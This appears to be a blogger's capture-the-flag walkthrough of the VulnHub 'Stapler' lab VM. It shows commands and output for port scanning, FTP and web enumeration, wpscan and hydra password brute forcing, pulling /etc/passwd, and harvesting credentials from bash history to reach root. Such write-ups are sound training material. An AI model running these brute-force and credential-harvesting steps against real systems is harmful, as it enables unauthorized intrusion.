Reaping bytes, one shell at a time: Execuse me...I believe you have my stapler

`Stapler`

He110 w0rld! Today i will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @

g0tmi1k.

As always there will be spoilers within this guide so use as little or as much as you need.

***With all these VMs there are always multiple ways to r00t the box***

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

Lets reap some bytes...

`Discovery`

Command: netdiscover -r 192.168.153.0/24

***Please note your IP Range can/will differ***

0	Currently scanning: 192.168.153.0/24 \| Screen View: Unique Hosts
1	3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
2	_____________________________________________________________________________
3	IP At MAC Address Count Len MAC Vendor / Hostname
4	-----------------------------------------------------------------------------
5	192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc.
6	192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc.
7	192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc.

Enumeration

Command: nmap -sS -Pn -p1-65535 192.168.153.142

0	root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142
1	Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT
2	Nmap scan report for Red.Initech (192.168.153.142)
3	Host is up (0.00023s latency).
4	Not shown: 65523 filtered ports
5	PORT STATE SERVICE
6	20/tcp closed ftp-data
7	21/tcp open ftp
8	22/tcp open ssh
9	53/tcp open domain
10	80/tcp open http
11	123/tcp closed ntp
12	137/tcp closed netbios-ns
13	138/tcp closed netbios-dgm
14	139/tcp open netbios-ssn
15	666/tcp open doom
16	3306/tcp open mysql
17	12380/tcp open unknown
18	MAC Address: 00:0C:29:8B:3C:14 (VMware)

Lots of fun stuff to play with.

`Service Exploration`

`FTP`

0	root@lulb0x:~# ftp 192.168.153.142
1	Connected to 192.168.153.142.
2	220-
3	220-\|-----------------------------------------------------------------------------------------\|
4	220-\| Harry, make sure to update the banner when you get a chance to show who has access here \|
5	220-\|-----------------------------------------------------------------------------------------\|
6	220-
7	220
8	Name (192.168.153.142:root): Anonymous
9	331 Please specify the password.
10	Password:
11	230 Login successful.
12	Remote system type is UNIX.
13	Using binary mode to transfer files.
14	ftp> ls
15	200 PORT command successful. Consider using PASV.
16	150 Here comes the directory listing.
17	-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
18	226 Directory send OK.
19	ftp> get note
20	local: note remote: note
21	200 PORT command successful. Consider using PASV.
22	150 Opening BINARY mode data connection for note (107 bytes).
23	226 Transfer complete.
24	107 bytes received in 0.00 secs (50.0442 kB/s)
25	ftp> exit

Interesting a potential user Harry i will add this to the list of potential users. Reading our loot (note) reveals...

0	root@lulb0x:~# cat note
1	Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

Once again more potential users elly and john. With nothing more to see / do in the FTP realm at this time we move on.

SSH

Usually there is nothing to gain from trying to SSH at this point but i always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.

0	root@lulb0x:~# ssh 192.168.153.142
1	-----------------------------------------------------------------
2	~ Barry, don't forget to put a message here ~
3	-----------------------------------------------------------------
4	root@192.168.153.142's password:

Sweet, another potential user barry... at this point we can try to brute force the ssh service but i will hold off abit longer just in case. No need to make more noise at this point.

666 - The port of the beast!!!

0	root@lulb0x:~# nc 192.168.153.142 666
1	PK d��Hp� ��, 2
2	message2.jpgUT +�QWJ�QWux
3	� �z
4	T ��P��A@� �UT�T � 2>��RDK �Jj�"DL[E�
5	0<Ĵ�ʮn��V �W�H �

Brutal... Looks like someone wants me to have a file of some sort.
Command: nc 192.168.153.142 666 > SatanicFile

0	root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File
1	Satanic_File: Zip archive data, at least v2.0 to extract

So our Satanic_File seems to be a Zip file.
Command: Unzip Satanic_File

0	root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip
1	Archive: Satanic_File.zip
2	inflating: message2.jpg

So the unzip reveals a JPG that has a message that displays.

Great yet another potential user: scott
Now, i have been burned a couple times in these VMs by not checking out the jpgs for hidden messages. So i always run strings on the images.
Command: strings message2.jpg

0	JFIF
1	vPhotoshop 3.0
2	8BIM
3	1If you are reading this, you should get a cookie!

If you are reading this you should get a cookie.....no thanks, i dont eat cookies, i steal them :) Seems that there is nothing else to to with Satans Port. So we move along.

Port 12380

Trying to figure out what port 12380 contains with netcat was pretty simple.

Interesting a webpage with 3 more peoples names:
dave
tim
zoe

Port 80 /12380 : Http(s?)

Since we know that 12380 turned out to be a website we can now run nikto and dirb/dirbuster against them.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142

0	root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142
1	- Nikto v2.1.6
2	---------------------------------------------------------------------------
3	+ Target IP: 192.168.153.142
4	+ Target Hostname: 192.168.153.142
5	+ Target Port: 80
6	+ Start Time: 2016-06-27 10:56:46 (GMT-4)
7	---------------------------------------------------------------------------
8	+ Server: No banner retrieved
9	+ The anti-clickjacking X-Frame-Options header is not present.
10	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
11	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
12	+ No CGI Directories found (use '-C all' to force check all possible dirs)
13	+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
14	+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
15	+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
16	+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
17	+ End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds)
18	---------------------------------------------------------------------------
19	+ 1 host(s) tested
20	-----------------
21	DIRB v2.22
22	By The Dark Raver
23	-----------------
24	START_TIME: Mon Jun 27 10:56:58 2016
25	URL_BASE: http://192.168.153.142/
26	WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
27	-----------------
28	GENERATED WORDS: 4612
29	---- Scanning URL: http://192.168.153.142/ ----
30	+ http://192.168.153.142/.bashrc (CODE:200\|SIZE:3771)
31	+ http://192.168.153.142/.profile (CODE:200\|SIZE:675)
32	-----------------
33	END_TIME: Mon Jun 27 10:57:02 2016
34	DOWNLOADED: 4612 - FOUND: 2

We can see that it initially finds 2 files: .bashrc and .profile.
Looking quickly i didn't find anything of earth-shattering awesome sauce so i moved on to 12380 Command: nikto -host 192.168.153.142 -port 12380;

0	root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;
1	- Nikto v2.1.6
2	---------------------------------------------------------------------------
3	+ Target IP: 192.168.153.142
4	+ Target Hostname: 192.168.153.142
5	+ Target Port: 12380
6	---------------------------------------------------------------------------
7	+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
8	Ciphers: ECDHE-RSA-AES256-GCM-SHA384
9	Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here? /O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
10	+ Start Time: 2016-06-27 11:01:00 (GMT-4)
11	---------------------------------------------------------------------------
12	+ Server: Apache/2.4.18 (Ubuntu)
13	+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
14	+ The anti-clickjacking X-Frame-Options header is not present.
15	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
16	+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
17	+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
18	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
19	+ No CGI Directories found (use '-C all' to force check all possible dirs)
20	+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
21	+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
22	+ "robots.txt" contains 2 entries which should be manually viewed.
23	+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech
24	+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
25	+ Uncommon header 'x-ob_mode' found, with contents: 1
26	+ OSVDB-3233: /icons/README: Apache default file found.
27	+ /phpmyadmin/: phpMyAdmin directory found
28	+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
29	+ End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds)

So we are getting a ssl cert and we get another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a cms) nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :) )

Moving on...

blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.

For this next part i am going to use wpscan to find everything of value (If you are looking for another awesome tutorial, a video one, check out https://7ms.us Brian does a great job of explaining what flags to use for wpscan. Thanks Brian @7minsec)

Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a

0	_______________________________________________________________
1	__ _______ _____
2	\ \ / / __ \ / ____\|
3	\ \ /\ / /\| \|__) \| (___ ___ __ _ _ __
4	\ \/ \/ / \| ___/ \___ \ / __\|/ _` \| '_ \
5	\ /\ / \| \| ____) \| (__\| (_\| \| \| \| \|
6	\/ \/ \|_\| \|_____/ \___\|\__,_\|_\| \|_\|
7	WordPress Security Scanner by the WPScan Team
8	Version 2.9.1
9	Sponsored by Sucuri - https://sucuri.net
10	@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
11	_______________________________________________________________
12	[+] URL: https://192.168.153.142:12380/blogblog/
13	[+] Started: Mon Jun 27 11:17:31 2016
14	[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number
15	[+] Interesting header: DAVE: Soemthing doesn't look right here
16	[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
17	[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register
18	[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php
19	[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/
20	[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/
21	[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
22	[!] 21 vulnerabilities identified from the version number

So we know that it is running version 4.2.1 with 21 vulnerabilities...nice... But i want to see what (if any) users could be found.

0	[+] Enumerating usernames ...
1	[+] Identified the following 16 user/s:
2	+----+---------+-----------------+
3	\| Id \| Login \| Name \|
4	+----+---------+-----------------+
5	\| 1 \| john \| John Smith \|
6	\| 2 \| elly \| Elly Jones \|
7	\| 3 \| peter \| Peter Parker \|
8	\| 4 \| barry \| Barry Atkins \|
9	\| 5 \| heather \| Heather Neville \|
10	\| 6 \| garry \| garry \|
11	\| 7 \| harry \| harry \|
12	\| 8 \| scott \| scott \|
13	\| 9 \| kathy \| kathy \|
14	\| 10 \| tim \| tim \|
15	\| 11 \| zoe \| ZOE \|
16	\| 12 \| dave \| Dave \|
17	\| 13 \| simon \| Simon \|
18	\| 14 \| abby \| Abby \|
19	\| 15 \| vicki \| Vicki \|
20	\| 16 \| pam \| Pam \|
21	+----+---------+-----------------+

Damn.... Thats alot of users, some of which look pretty familiar:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly

I remember seeing a message for elly stating that there was a payload waiting for her in her ftp account... or something like that. lets see if wpscan can brute her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly

****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****
****NOTE v2.0: I created a bruteforcer in python for finding the password also, as a codemonkey i feel the need to always try on my own. If anyone wants it feel free to leave a comment and i can share with you****

0	[+] Enumerating plugins from passive detection ...
1	[+] No plugins found
2	[+] Starting the password brute forcer
3	[+] [SUCCESS] Login : elly Password : ylle
4	Brute Forcing 'elly' Time: 00:18:01
5	+----+-------+------+----------+
6	\| Id \| Login \| Name \| Password \|
7	+----+-------+------+----------+
8	\| \| elly \| \| ylle \|
9	+----+-------+------+----------+
10	[+] Finished: Mon Jun 27 11:46:55 2016
11	[+] Requests Done: 99717
12	[+] Memory used: 42.395 MB
13	[+] Elapsed time: 00:18:04

Ooh... elly was cracked with the password of ylle.
Lets switch back and try her credentials on the ftp service and see if we get lucky with some password reuse.

0	root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142
1	Connected to 192.168.153.142.
2	220-
3	220-\|-----------------------------------------------------------------------------------------\|
4	220-\| Harry, make sure to update the banner when you get a chance to show who has access here \|
5	220-\|-----------------------------------------------------------------------------------------\|
6	220-
7	220
8	Name (192.168.153.142:root): elly
9	331 Please specify the password.
10	Password:
11	230 Login successful.
12	Remote system type is UNIX.
13	Using binary mode to transfer files.

Bingo... but what can we see
Command: ls

0	ftp> ls
1	200 PORT command successful. Consider using PASV.
2	150 Here comes the directory listing.
3	drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11
4	drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi
5	-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf
6	-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases
7	-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db
8	drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives
9	drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2
10	drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor
11	drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d
12	drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport
13	drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt
14	-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny
15	drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind
16	-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
17	drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d
18	-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist
19	drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d
20	drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu
21	drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates
22	-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf
23	drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup
24	drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d
25	drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily
26	drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly
27	drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly
28	drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly
29	-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab
30	-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab
31	drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common
32	drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1
33	-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
34	-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
35	drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default
36	-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
37	drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d
38	drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp
39	-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
40	drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d
41	drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg
42	-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment
43	drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts
44	-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab

/etc = lulz lets grab the passwd file and see if any of our potential users are actual users
Command: get passwd

0	ftp> get passwd
1	local: passwd remote: passwd
2	200 PORT command successful. Consider using PASV.
3	150 Opening BINARY mode data connection for passwd (2908 bytes).
4	226 Transfer complete.
5	2908 bytes received in 0.00 secs (6.6826 MB/s)

Command: cat passwd | grep bash | cut -d':' -f1

0	RNunemaker
1	ETollefson
2	DSwanger
3	AParnell
4	SHayslett
5	MBassin
6	JBare
7	LSolum
8	MFrei
9	SStroud
10	JKanode
11	CJoo
12	Drew
13	jess
14	SHAY
15	mel
16	zoe
17	NATHAN
18	elly

Okay time to let hydra do what it does best. Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u

0	root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
1	Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2	Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14
3	[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
4	[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
5	[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task
6	[DATA] attacking service ssh on port 22
7	[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active
8	[22][ssh] host: 192.168.153.142 login: Drew password: qwerty
9	[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active
10	[22][ssh] host: 192.168.153.142 login: JBare password: cookie

Using the credentials JBare:cookie
Trying to cut some corners, since it seems that all the home folders are public readable....
Command: cat */.bash_history

0	JBare@red:/home$ cat */.bash_history
1	exit
2	free
3	exit
4	exit
5	exit
6	exit
7	exit
8	exit
9	exit
10	exit
11	top
12	ps aux
13	exit
14	exit
15	exit
16	id
17	whoami
18	ls -lah
19	pwd
20	ps aux
21	sshpass -p thisimypassword ssh JKanode@localhost
22	apt-get install sshpass
23	sshpass -p JZQuyIN5 peter@localhost
24	ps -ef
25	top
26	kill -9 3747
27	exit
28	exit
29	exit
30	exit
31	exit
32	whoami
33	exit
34	exit
35	exit
36	exit
37	exit
38	cat: peter/.bash_history: Permission denied
39	exit
40	exit
41	exit
42	exit
43	exit
44	exit
45	id
46	top
47	exit

Nice... 2 more sets of credentials

JKanode:thisismypassword
peter:JZQuyIN5

I am going to try peters credentials first because he has a stronger password...i would like to believe he is a sudoer at a minimum.

Jackpot...peter has full root access with a sudo su we get root and claim our flag

I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.

Reaping bytes, one shell at a time

Monday, June 27, 2016

Execuse me...I believe you have my stapler